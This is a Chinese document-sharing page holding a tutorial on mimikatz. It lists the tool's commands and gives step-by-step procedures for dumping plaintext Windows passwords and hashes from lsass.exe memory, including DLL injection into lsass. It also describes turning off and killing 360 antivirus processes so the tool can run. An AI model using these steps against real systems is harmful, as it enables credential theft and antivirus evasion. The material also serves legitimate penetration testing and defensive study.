欢迎来到天天文库
浏览记录
ID:55905704
大小:365.00 KB
页数:13页
时间:2020-06-13
《神器mimikatz使用详解.doc》由会员上传分享,免费在线阅读,更多相关内容在教育资源-天天文库。
1、神器mimikatz使用详解一.mimikatz简介mimikatz是法国人GentilKiwi编写的一款windows平台下的神器,它具备很多功能,其中最亮的功能是直接从lsass.exe 进程里获取windows处于active状态账号的明文密码。mimikatz的功能不仅如此,它还可以提升进程权限,注入进程,读取进程存等等,mimikatz包含了很多本地模块,更像是一个轻量级的调试器,其强大的功能还有待挖掘。作者主页:blog.gentilkiwi./二.mimikatz基础命令随便输入”xxx::”
2、,会提示”modules:’xxx’intr0uvable”,大概意思就是你输入的命令不存在,然后会列出所有可用的命令所有的模块与命令,如下图(左边的是模块名称,右边的是描述):1.cls 清屏2.exit 退出3.version 查看mimikatz的版本4.help 查看帮助信息(全是法文,只能找google了)5.system::user 查看当前登录的系统用户6.system::computer 查看计算机名称7.process::list 列出进程8.process::suspe
3、nd进程名称 暂停进程QQ进程还在,只是QQ无法使用了。9.process::stop进程名称 结束进程10.process::modules 列出系统的核心模块及所在位置11.service::list 列出系统的服务12.service::remove 移除系统的服务13.service::startstop服务名称 启动或停止服务14.privilege::list 列出权限列表15.privilege::enable 激活一个或多个权限16.privilege::debug 提升权
4、限17.nogpo::cmd 打开系统的cmd.exe18.nogpo::regedit 打开系统的注册表19.nogpo::taskmgr 打开任务管理器20.ts::sessions 显示当前的会话21.ts::processes 显示进程和对应的pid情况等22.sekurlsa::wdigest 获取本地用户信息及密码23.sekurlsa::wdigest 获取kerberos用户信息及密码24.sekurlsa::tspkg 获取tspkg用户信息及密码25.sekurls
5、a::logonPasswords 获登陆用户信息及密码ps:1.由于命令很多,就不一一列出了。 2.kerberos是一种网络认证协议。至于tspkg好像是与远程连接时的网络身份认证有关的。三:mimikatz获取用户名及密码的方法方法一:1.运行主程序:mimikatz.exe2.输入:privilege::debug 提升权限3.输入:inject::processlsass.exesekurlsa.dll 将sekurlsa.dll注入到lsass.exe中4.输入:getLogo
6、nPasswords 即可获取hash和当前用户的明文密码!原理就是登陆的时候输入的密码,经过lsass.exe里的wdigest和tspkg两个模块调用后,它们对之进行加密处理,而没有进行擦除,而且该加密通过特征可以定位,并且按照微软的算法可逆。 只要登陆过,就可以抓出来,它进行枚举的。简单地说,在Windows中,当用户登录时,lsass.exe使用一个可逆的算法,加密过的明文密码,并且把密文保存在存中,没有清理,然后可以抓出来,还原。 也就是说,开机以后,只要是登陆过的用户,在没重启前(因为重启
7、存就清零了,这里不包括使用其他方法清理存),都可以抓出来,注销也是无用的,因为存中的密码并没有清除,所以还是可以抓出来的。 方法二(直接调用sekurlsa模块):1.运行主程序:mimikatz.exe2.输入:privilege::debug 提升权限3.输入:sekurlsa::logonPasswordsfull或四.实际测试一.测试系统:Windows7旗舰版测试情况如下图:在网上看到一些文章说,安装了360之类的杀毒软件后,神器就无法使用了,于是在本地测试了一下。无论是启动着360,还是
8、退出了360,都会出来下面的情况。就是在输入inject::processlsass.exesekurlsa.dll时提示:拒绝访问(如下图)后来到进程里看了一下,原来360的主动防御进程还在,。接着把360的实时防护全部关掉,再把那个进程结束掉就可以正常使用mimikatz了。二.测试系统:WindowsXP专业版sp3测试情况如下图:三.测试环境:远程连接一台虚拟机中的Windows7旗舰版直接运行mimik
此文档下载收益归作者所有